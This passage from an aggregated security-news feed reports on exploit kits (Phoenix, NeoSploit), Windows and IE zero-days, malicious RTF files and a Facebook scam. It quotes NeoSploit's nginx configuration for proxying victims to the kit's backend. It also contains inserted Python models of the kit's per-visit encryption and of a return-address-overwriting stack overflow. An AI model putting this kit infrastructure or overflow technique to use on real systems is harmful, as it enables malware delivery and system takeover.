  • XPOTHER – Browsers other than Internet Explorer on Windows XP, Windows XP SP2 or Windows 2003
  • VISTAOTHER – Browsers other than Internet Explorer on Windows Vista
  • WIN7OTHER – Browsers other than Internet Explorer on Windows 7

Once users are directed to a payload page, the kit attempts to exploit vulnerabilities in versions of the Adobe PDF Reader, Adobe Flash, Internet Explorer and Java.

Java has become the leading exploit vector for a variety of exploit packs. In fact, the Phoenix Exploit Kit version 2.5 has been updated to include three additional Java exploits:

  • JAVA RMI
  • JAVA MIDI
  • JAVA SKYLINE

The administration panel of Phoenix Exploit Kit 2.5 contains an option to switch modes, which changes the Java exploit delivered to users. It allows the administrator to choose between TC (CVE-2010-0840), RMI or MIDI. This indicates that exploits for Java have become very attractive to malware distributors.


By targeting a wide variety of configurations, the Phoenix Exploit Kit 2.5 attempts to maximize its ability to compromise Internet users. If the first exploit fails, it targets another vulnerable application on the user’s computer. As such, users are advised to always ensure that the applications installed on their computers are kept up-to-date so they can avoid possible exploit attacks.

Post from: TrendLabs | Malware Blog – by Trend Micro


Posted in Antivirus

Scammers exploit viral video of girl falling into fountain while texting

A YouTube video is beginning to be shared widely across the internet this weekend, apparently showing a girl in a mall who is so distracted by sending text messages on her mobile phone that she falls into a fountain.

The footage appears to be taken from CCTV security cameras and you can hear the laughter of mall employees as they watch the girl time and time again fall face first into the fountain.

(This does, of course, raise questions of privacy if the video was not staged. Should security workers really be posting CCTV footage onto YouTube for entertainment purposes? But that’s a debate which is off-topic for the purposes of this article.)

What is of most interest to Naked Security readers is that scammers appear to be exploiting the rising popularity of the video for their own financial ends.

Experts at Sophos have discovered a rogue application on Facebook which posts links from your profile claiming to point to the video. The links are really intended to generate income for the scammers by making you complete surveys, and to compromise your account so that it spreads the links even further.

Imagine you see a message like the following posted by one of your Facebook friends. Would you click on the link?

Girl falls into fountain while texting

If you were to click then you would be taken to a flashy advert for the video you are about to see:


The page reads:

GIRL FALLS IN TO FOUNTAIN BECAUSE SHES TOO BUSY TEXTING TO LOOK UP!

This is why your not supposed to text and drive or even text and WALK apparently! This chick epic failed by walking in to a water fountain because she was too busy talking on her phone to PAY ATTENTION TO WHATS IN FRONT OF HER

EPIC FAIL!

CLICK HERE TO WATCH THE WHOLE VIDEO!

If you do click to see more, then you are asked to give permission for a third-party Facebook application to access your account.


As you can see (if you bother to read the small print), the rogue application wants to access your name, gender, list of friends, profile picture and other information. It also requests the rights to post to your wall (including any Facebook pages you manage) and even email you directly.

Should this really be necessary in order to watch a video that’s freely available on YouTube?

Unfortunately some people won’t worry about their privacy at this point, and will happily grant an application written by complete strangers access to their accounts, which is exactly what lets it spread the spammy message.

So what have the bad guys got to gain from this? Well, they try to trick you into completing a survey before you can watch the video.


Remember, the video is freely available on YouTube, where you don’t need to complete any surveys. Every time you complete a survey you earn a little commission for the scammers who are spreading the messages. We have been in contact with Facebook’s security team, and asked them to shut down the offending pages.

So don’t make it easy for the scammers, and always be very cautious about what applications you allow to access your Facebook profile.

Here’s a YouTube video where I show you how to clean up your Facebook account if you were hit by this, or similar scams:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Keep your wits about you and stay informed about the latest scams spreading fast across Facebook. One of the best ways to do that is to join the Sophos Facebook page, where more than 50,000 people regularly share information on threats and discuss the latest security news.

Full story: Naked Security – Sophos

Posted in Antivirus

Windows 0-day exploit: Q&A session

Here is a Q&A session to address some questions we have received since yesterday:

1) What versions of Microsoft Windows are affected by this flaw?

The released exploit hit only Windows Vista and Windows 7. We have found that the flaw affects Windows XP, Windows Server 2003 and Windows Server 2008 as well – both x86 and x64.

2) Can this flaw be exploited from remote?

No, it can’t. It is a local privilege escalation exploit, which means the malware must already be on the target machine before it can use this flaw.

3) Why is this flaw considered critical?

This flaw allows any software, even when run from a limited account, to gain SYSTEM privileges. We see many drive-by attacks that use application exploits to drop malware on vulnerable machines. While a huge number of users still run their operating system with administrative privileges, most now use limited accounts or administrator accounts in Admin Approval Mode (User Account Control). A limited account is a great advantage against malware, because it limits the surface the malware can damage. This 0-day exploit allows malware that has already been dropped on the system to bypass these limitations and take full control of the system.

4) How can I defend my PC from this exploit?

Until Microsoft releases a patch, you can install Prevx Antimalware from our website. Our software has been updated to prevent this exploit from working since build release 3.0.5.220. (download here) You don’t even need to pay for a license, the protection is already active even in the free version of Prevx. Then, of course, if you like the software, we’d be pleased to defend your system security :)

Also, you must always keep your system up to date by installing Windows updates. Moreover, you need to keep all the software installed on your PC up to date, to limit potential attack vectors as much as possible. Do not visit unsafe websites such as porn or crack/warez sites, which are often vehicles for malware. Be careful when you download anything through peer-to-peer applications like eMule.

5) Will Microsoft release a patch to address this flaw?

Microsoft is actively working to analyze the flaw and fix this issue as soon as possible.

6) Where can I find a description of the exploit?

We haven’t released any in-depth technical detail about the exploit, even though the whole exploit code is already public on the web. The flaw is a stack overflow in the win32k.sys driver which can be exploited to gain code execution in kernel mode. More details at this link

View the original article at Prevx Blog

Posted in Prevx


Shedding Light on the NeoSploit Exploit Kit

Over the last few years, we’ve witnessed dozens of exploit kits such as the Phoenix Exploit Kit, Eleonore Exploit Kit and Yes Exploit Kit, and even some old ones such as IcePack and MPack.  We’ve observed that most exploit kits don’t last more than one year, except for one…

NeoSploit Administration Login Panel.


Background: The Old NeoSploit

The NeoSploit Exploit Kit was first seen by M86 Labs in 2007.  It was one of the first exploit kits developed to exploit browser-side vulnerabilities such as the MDAC RDS bug and assorted ActiveX flaws.  The kit later added the Adobe Reader Collab.collectEmailInfo vulnerability as a further attack vector.

In April 2008, the NeoSploit team released Version 3, which included improved statistics and configuration control as well as a stabilized and sophisticated exploit package.  However, in July the team announced it would stop supporting and updating the NeoSploit project due to financial problems.  This led to a rapid decline in NeoSploit’s prominence in the wild until it disappeared. Rumors began to spring up that the source code of NeoSploit had been leaked.

The Return of Neosploit

At the end of 2009, we noticed a new trend of obfuscation techniques that were pretty similar to what we have seen before from the notorious NeoSploit Exploit Kit. Since seeing the first occurrence of this new version of NeoSploit, the concept has stayed the same.

Snippet Obfuscated Code from November 2009.


Snippet Obfuscation Technique from a New Version.


In both versions of the obfuscated script shown above, the code generates a decryption function together with a unique key. The key is sent back to the server along with a fingerprint of the software installed on the victim’s machine, such as the browser and Adobe product versions.

The URL that was Generated Including the Secret Key and Details on the Victim Browser.


In the second phase of the exploitation, the client retrieves the encrypted exploit page containing the exploits relevant to the vulnerable applications on the victim’s machine. Because the page is encrypted under the per-visit key, its bytes differ for every victim, so static signatures on the response do not match. Although we had already seen this encryption technique used by the Luckysploit toolkit more than a year ago, this dynamic obfuscation still makes it much harder for security vendors to block this type of attack.
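The two-phase exchange described in the paragraphs above, as an added example that is not part of the original post or of NeoSploit itself. The cipher (a repeating-key XOR), the fingerprint fields (browser, reader) and the exploit-selection table are assumptions standing in for the kit’s real logic, which the post does not show, and the "exploit pages" are empty placeholders. The request path copies the /XXXX/shop.php pattern quoted later in the post. The last function is the defender’s side: because the key travels in the request URL, anyone holding both the request and the response can recover the cleartext page even though the bytes on the wire are unique per victim.

```python
# Added illustration of the two-phase exchange; this is not NeoSploit's code.
# The cipher (repeating-key XOR), the fingerprint fields and the exploit
# selection table are assumptions chosen to show the mechanism.
import os
import base64
from urllib.parse import urlencode, urlsplit, parse_qsl

# Constructed rules standing in for the kit's "which page for which software"
# logic; the pages are placeholders, not exploit code.
EXPLOIT_TABLE = [
    (lambda fp: fp.get("reader", "").startswith("8."), "<script>/* reader page */</script>"),
    (lambda fp: fp.get("browser") == "MSIE 6",          "<script>/* browser page */</script>"),
]


def xor_with_key(data, key):
    """Repeating-key XOR: a stand-in for whatever stream cipher the kit really uses."""
    k = key.encode()
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data))


def build_phase_one_request(fingerprint, rand=os.urandom):
    """Client side: mint a one-time key and send it with the software fingerprint.
    Returns (key, url); the path mirrors the /XXXX/shop.php pattern from the post."""
    key = rand(8).hex()
    params = urlencode({"key": key, **fingerprint})
    return key, "/XXXX/shop.php?%s" % params


def server_respond(url):
    """Server side: pick exploits for this fingerprint and encrypt the page under
    the visitor's key, so no two responses look alike on the wire."""
    params = dict(parse_qsl(urlsplit(url).query))
    key = params.pop("key")
    page = "\n".join(p for match, p in EXPLOIT_TABLE if match(params))
    return base64.b64encode(xor_with_key(page.encode(), key)).decode()


def client_decrypt(response_b64, key):
    """Second phase on the client: recover the page the kit would then run."""
    return xor_with_key(base64.b64decode(response_b64), key).decode()


def decrypt_from_capture(request_url, response_b64):
    """Defender's view: the key rides in the request URL, so a proxy log or pcap
    holding both request and response is enough to recover the cleartext."""
    key = dict(parse_qsl(urlsplit(request_url).query))["key"]
    return client_decrypt(response_b64, key)


if __name__ == "__main__":
    victim = {"browser": "MSIE 6", "reader": "8.1"}   # constructed fingerprint
    key, url = build_phase_one_request(victim)
    response = server_respond(url)
    print(url)
    print(response)                      # unique per visit
    print(decrypt_from_capture(url, response))
```

The practical consequence for detection is in the last function: signatures on the response body fail, but any sensor that sees the request URL and the response together can decrypt the page offline, which is why proxy logs and full-packet capture remain useful against this style of kit.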

Low Detection by the Anti-Virus Companies 3/42


Shedding Light on the Architecture of Neosploit

Not only has the NeoSploit team upgraded their obfuscation techniques, they’ve also put a lot of thought into the architecture of the toolkit’s backend.  Unlike other exploit kits, where the authors sell the toolkit itself (in some cases with encrypted source code that only works under a certain domain), the users of the NeoSploit Exploit Kit don’t need to have the source code or even a compiled copy of the tool.  The NeoSploit backend is operated only by the team itself and the users merely receive access to it, effectively establishing a Malware-as-a-Service business model.

The URL pattern of the infection page is exactly the same in each attack:

be—[REMOVED]–we.info/XXXX/shop.php

The XXXX path segment is the hook: in the sample above, the front-end web server (Apache or nginx) matches that path and forwards the request to the backend server, as in the nginx configuration below.

location /XXXX/ {
    # everything under /XXXX/ is proxied to the NeoSploit backend on port 8333
    proxy_pass http://–[REMOVED IP ADDRESS]–:8333/XXXX/;
    proxy_redirect http://–[REMOVED]–/ http://$host/;
    proxy_set_header Host –[REMOVED]–;
    # the original hostname and the visitor's IP travel to the backend in custom headers
    proxy_set_header Client-Host $host;
    proxy_set_header Client-IP $remote_addr;
}
location ~ \.(php|inc)$ {
    # any other PHP on the front end is served locally through FastCGI
    try_files      $uri =404;
    root           html;
    fastcgi_pass   127.0.0.1:8888;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME  /usr/local/nginx/html$fastcgi_script_name;
    include        fastcgi_params;
}
}   # closes the enclosing server { } block, whose opening is not shown in the excerpt

The above code was taken from a NeoSploit nginx configuration file.  It forwards every request under the /XXXX/ path to the backend server and adds request headers (Client-Host, Client-IP) that tell the backend which front-end host and which visitor the request came from. One caveat when reading the excerpt: in nginx a regular-expression location such as ~ \.(php|inc)$ takes precedence over a plain prefix location, so as shown /XXXX/shop.php would be handed to the local FastCGI handler rather than proxied; the working configuration presumably declares the prefix as ^~ /XXXX/ or the excerpt is abridged.

The architecture used by the NeoSploit team is effective on several levels:

  • It simplifies installation: the customer never installs the toolkit itself, only a reverse-proxy rule that forwards requests to the backend server
  • It makes it much harder to expose the team behind the toolkit
  • It simplifies the toolkit update procedure, since only the backend has to change

Neosploit 4 Control Panel

As mentioned above, the attacker never interacts directly with the backend server; he monitors and manages the progress of his attack through a proxy that connects to the backend server.

The control panel of the Neosploit has not changed much:

Administration Panel of Neosploit 4 – Daily Stats


Note the volume of incoming traffic redirected to the toolkit, and its high infection rate, above 20 percent.

The control panel of the toolkit includes the version of the toolkit: Version 4.2 (build 4281).  As described above, the Neosploit team is capable of updating the toolkit, thus simplifying the process for their customers.

Neosploit 4 Configuration Rules of the Payload


The customer doesn’t host the payload on their own server; they upload it via the NeoSploit control panel, which allows them to define a payload for each operating system, country and browser:

Neosploit 4, Country Statistics of a Certain Attack Day


Neosploit 4, Browser Statistics.


The fact is that almost four years after the first version of the Neosploit project was published, the project continues to thrive and remain active.  This showcases the fact that a good product can survive over time, so long as it is being maintained and adjusted to keep up with security trends to allow it to stay ahead of the curve.

Full story: M86 Security Labs Blog

Posted in Antivirus

Zero-day Windows exploit – Microsoft issues advisory

Microsoft has just published an advisory about a remotely-exploitable vulnerability in the Windows graphics rendering engine. A patch isn’t available yet, but with Patch Tuesday just a week away, we can hope that it will be knocked on the head then.

The bug was presented as a sort-of “hacker case study” at a recent hacking convention in Korea, and a working exploit was recently added to the freely-available Metasploit Framework by a developer named jduck.

Fortunately, the Metasploit exploit code is rather limited, officially targeting only Windows 2000 and Windows XP SP3, but it does serve as a documented proof-of-concept for anyone who cares to study it.

According to jduck (no relation to me – his real name is Joshua Drake, geddit?), the vulnerability exists in code which processes a DIB (device-independent bitmap), allowing a “stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents.”

This isn’t the first time that Microsoft has been hit by security problems processing graphical objects.

A calculation flaw in handling JPEG files led to a remotely exploitable hole in September 2004, a long-forgotten feature-turned-bug in WMF (Windows Metafile) handling forced an out-of-band security fix in January 2006, and in August 2010, bitmap-handling code was the culprit in a kernel vulnerability which allowed unprivileged users to crash Windows computers at will.

Sadly, our increasing insistence that everything we see on the internet be served up in a sea of graphical gewgaws comes with considerable risk: greatly increased code complexity, the unrelenting enemy of computer security.

Full story: Naked Security – Sophos

Posted in Antivirus

In 2011, this exploit kit won’t work

And some Web sites will be a lot safer! While reviewing incidents and deobfuscating a Web site today, I discovered an installation of a particular exploit kit that won't work after New Year's Eve.  The site I found caught my attention because the code simply looks like garbage.  As the saying goes, "One man's trash is another man's treasure."  So I started digging into the obfuscation of the code and found something that I thought would be topical considering today's date.  The code in this exploit kit will actually expire at midnight on New Year's Eve local time!  In this post, I'll cover how I came across this and show you how and why the exploit kit installations will expire.

Here is a screen shot of the code in the original state as I found it:

…(read more)

Full story: Security Labs

Posted in Antivirus


Malicious .RTF Files Exploit Microsoft Office Vulnerability

A stack-based buffer overflow vulnerability in Microsoft Office was recently discovered to have been actively exploited in the wild. Trend Micro now detects the malicious .RTF files as TROJ_ARTIEF.SM.

The malicious .RTF files carry shellcode and data crafted to overflow a stack buffer in Microsoft Word. Depending on how the overflow lands, Word either crashes or the attacker’s shellcode runs, letting a malicious user execute arbitrary commands on the affected system.

The sample shows that the malware employed a NOP sled ahead of its shellcode, so that an imprecise jump still slides into the payload and the code executes in the context of Microsoft Word. The malware we encountered dropped another malicious file detected as TROJ_INJECT.ART.

One of the more serious concerns is that a malicious user could send an RTF email to target users. Since Microsoft Outlook uses Word to render email messages, merely opening or previewing a specially crafted message in the reading pane may be enough to trigger the exploit.

Microsoft has already released an update to address the vulnerability. Users are strongly advised to download and install the patch, which is described in the official bulletin MS10-087, issued as part of November’s Patch Tuesday.

Post from: TrendLabs | Malware Blog – by Trend Micro

Malicious .RTF Files Exploit Microsoft Office Vulnerability

– Karl Dominguez (Threat Response Engineer) on TrendLabs | Malware Blog – by Trend Micro

Posted in Antivirus

Exploit For Unpatched IE Vulnerability Released

Microsoft has issued an advisory for an unpatched vulnerability affecting all versions of Internet Explorer on all platforms. The vulnerability could allow a malicious web page to trigger a denial of service or remote code execution in the context of the IE user. Exploit code for the vulnerability has been published, but there are not yet any reports of active exploitation in the wild.

The vulnerability is of a type known as “use-after-free” and is in the CSharedStyleSheet::Notify function in the CSS parser in mshtml.dll. Multiple @import calls in the attack document trigger the vulnerability. It was first reported by wooyun.org.

The exploit bypasses ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention) by taking advantage of a library IE loads (mscorie.dll) which was not compiled with the /DYNAMICBASE option that opts a module into ASLR; it therefore loads at the same predictable address every time and gives the exploit known addresses to work with. Microsoft doesn’t say why this and apparently other libraries weren’t compiled with this option, but suggests using its Enhanced Mitigation Experience Toolkit (EMET) to force all loaded DLLs to be rebased regardless of how they were compiled. That change should make the exploit very unlikely to succeed. This video demonstrates the process.

Microsoft also stresses that Protected Mode in Internet Explorer 7 and 8 on Windows Vista, Windows 7 and Windows Server 2008 mitigates the vulnerability by limiting the privileges of attack code that succeeds in exploiting it.



– on Security Watch

Posted in Security

Blog: Lab Matters: ROP Techniques in Exploit Kits

Kaspersky Lab’s senior anti-malware researcher Kurt Baumgartner discusses the use of ROP (return-oriented programming) techniques in vulnerability exploit packs. – on Securelist / All Updates

Posted in Antivirus

Windows 0day Exploit Bypasses UAC

A proof-of-concept (POC) has appeared in the wild whose source code shows how to exploit a flaw in the Windows kernel API RtlQueryRegistryValues, which can lead to privilege elevation.

              …



  – Zarestel Ferrer on CA Security Advisor Research Blog

Posted in Antivirus

Exploit Leads to Remote Code Execution

Malware authors use existing software vulnerabilities in order to place their piece of malicious code into the victim’s system – WebMaster (news@malwarecity.com) on MalwareCity Blog

Posted in Antivirus

New Windows 0-day exploit speaks Chinese

This isn’t exactly what could be called a lucky year for Microsoft. Windows 7 sales are booming, but on the other hand the operating system made in Redmond has been hit hard by a lot of targeted attacks during these months. The Aurora exploit was just the first of the year, but the most serious attack has definitely been the Stuxnet case. Finding one 0-day exploit is always difficult, but using four 0-day exploits together is really impressive.

Yesterday another serious 0-day flaw was publicly disclosed on a Chinese forum.

This is a serious flaw because it resides in win32k.sys, the kernel-mode part of the Windows subsystem. It is a privilege escalation exploit which allows even limited user accounts to execute arbitrary code in kernel mode.

The NtGdiEnableEUDC API in win32k.sys does not properly validate some of its inputs, causing a stack overflow that overwrites the return address stored on the stack. An attacker can point the overwritten return address at his own code and have it executed with kernel-mode privileges.
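A model of the bug class the paragraph describes, added here and not the win32k.sys code: a fixed-size stack buffer filled from caller-controlled input without a length check, beside the hardened version that rejects oversized input. The frame is a ctypes structure laid out like a stack frame (buffer, saved frame pointer, return address) so the overwrite stays inside one object and is observable; BUF_SIZE, the filler byte and the return-address values are assumptions chosen to make the effect visible. The same model illustrates the earlier Prevx Q&A, which describes this win32k stack overflow.

```python
# Added model of the bug class (stack buffer overflow from an unvalidated
# length), NOT the win32k.sys code. The "stack frame" is a ctypes structure so
# the overwrite of the saved return address can be observed safely.
import ctypes

BUF_SIZE = 16   # assumed size of the local buffer


class Frame(ctypes.Structure):
    """Stand-in for a stack frame: the local buffer, then what an overflow reaches."""
    _fields_ = [
        ("buf", ctypes.c_uint8 * BUF_SIZE),   # fixed-size local buffer
        ("saved_fp", ctypes.c_uint64),        # saved frame pointer, just past the buffer
        ("return_addr", ctypes.c_uint64),     # return address that 'ret' will pop
    ]


def copy_unchecked(frame, src):
    """Vulnerable pattern: copies however many bytes the caller supplied."""
    # clamped to the frame size only so the demo never writes outside the structure
    n = min(len(src), ctypes.sizeof(frame))
    ctypes.memmove(ctypes.addressof(frame), src, n)
    return True


def copy_checked(frame, src):
    """Hardened pattern: refuse input longer than the buffer before touching the stack."""
    if len(src) > BUF_SIZE:
        return False          # a kernel routine would fail the call with an invalid-parameter status
    ctypes.memmove(ctypes.addressof(frame), src, len(src))
    return True


def build_input(target):
    """Attacker input shaped as the post describes: filler up to the return-address
    slot, then the address of the attacker's code (little-endian)."""
    return b"A" * Frame.return_addr.offset + target.to_bytes(8, "little")


def run(copy_fn, target=0x4141414141414141):
    """Copy attacker input into a fresh frame; return (accepted, return_addr afterwards)."""
    frame = Frame(return_addr=0xDEADBEEF)   # constructed 'legitimate' return address
    accepted = copy_fn(frame, build_input(target))
    return accepted, frame.return_addr


if __name__ == "__main__":
    print("unchecked:", run(copy_unchecked))   # return address now attacker-controlled
    print("checked:  ", run(copy_checked))     # rejected, return address intact
```

The length check is the whole fix: once the input cannot exceed the buffer, the saved frame pointer and return address are never reachable, which is what Microsoft’s patch for such a bug has to restore.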

Being a privilege escalation exploit, it bypasses by design even the protection given by User Account Control in Windows Vista and Windows 7. All of Windows XP, Vista and 7, both 32- and 64-bit, are vulnerable to this attack.

The good news is that we have not yet detected any malware exploiting this flaw. The bad news is that the flaw has been published online. This could become a nightmare given the nature of the flaw. We expect to see this exploit used actively by malware very soon; it’s an opportunity that malware writers surely won’t miss.

We won’t disclose any further detail about the vulnerability at the moment because we are collaborating with Microsoft on this flaw.

– Marco Giuliani on Prevx Blog

Posted in Antivirus
